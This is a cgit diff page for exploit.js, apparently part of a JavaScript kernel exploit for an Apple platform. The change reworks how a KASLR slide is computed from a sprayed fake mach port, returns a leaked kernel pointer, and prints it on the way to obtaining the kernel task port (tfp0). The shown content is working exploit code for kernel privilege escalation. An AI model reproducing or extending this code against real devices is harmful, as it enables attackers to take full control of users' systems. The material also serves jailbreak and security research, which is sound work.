summaryrefslogtreecommitdiff
path: root/src/js/kexp
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp')
-rw-r--r--src/js/kexp/exploit.js8
1 files changed, 6 insertions, 2 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 5296e6e..402dd9f 100644
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -20,6 +20,8 @@ var KERN_SUCCESS = 0;
var NULL = 0;
var MACH_PORT_NULL = 0;
+var kslide = 0;
+
var fakeportData = 0;
var kOSSerializeDictionary = 0x01000000;
@@ -130,11 +132,11 @@ function copyinPort(kport, cnt) {
// mach_port_deallocate(self, read_u32(data));
// write_u32(data, MACH_PORT_NULL);
spray_data(tst, strlen(tst) + 1, 10, fakeportData);
- var kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
+ kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
printf("still alive? %x\n", 420);
printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
- sleep(1);
found = true;
+ return (read_u32(buf + (4 << 2)) - 0x78);
}
}
@@ -177,6 +179,8 @@ function get_kernel_task() {
sched_yield();
var kptr = copyinPort(kport, 2);
+ printf("0x%08x\n", kptr);
+
printf("get lucky\n");
return tfp0;
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 23:16:37 +0000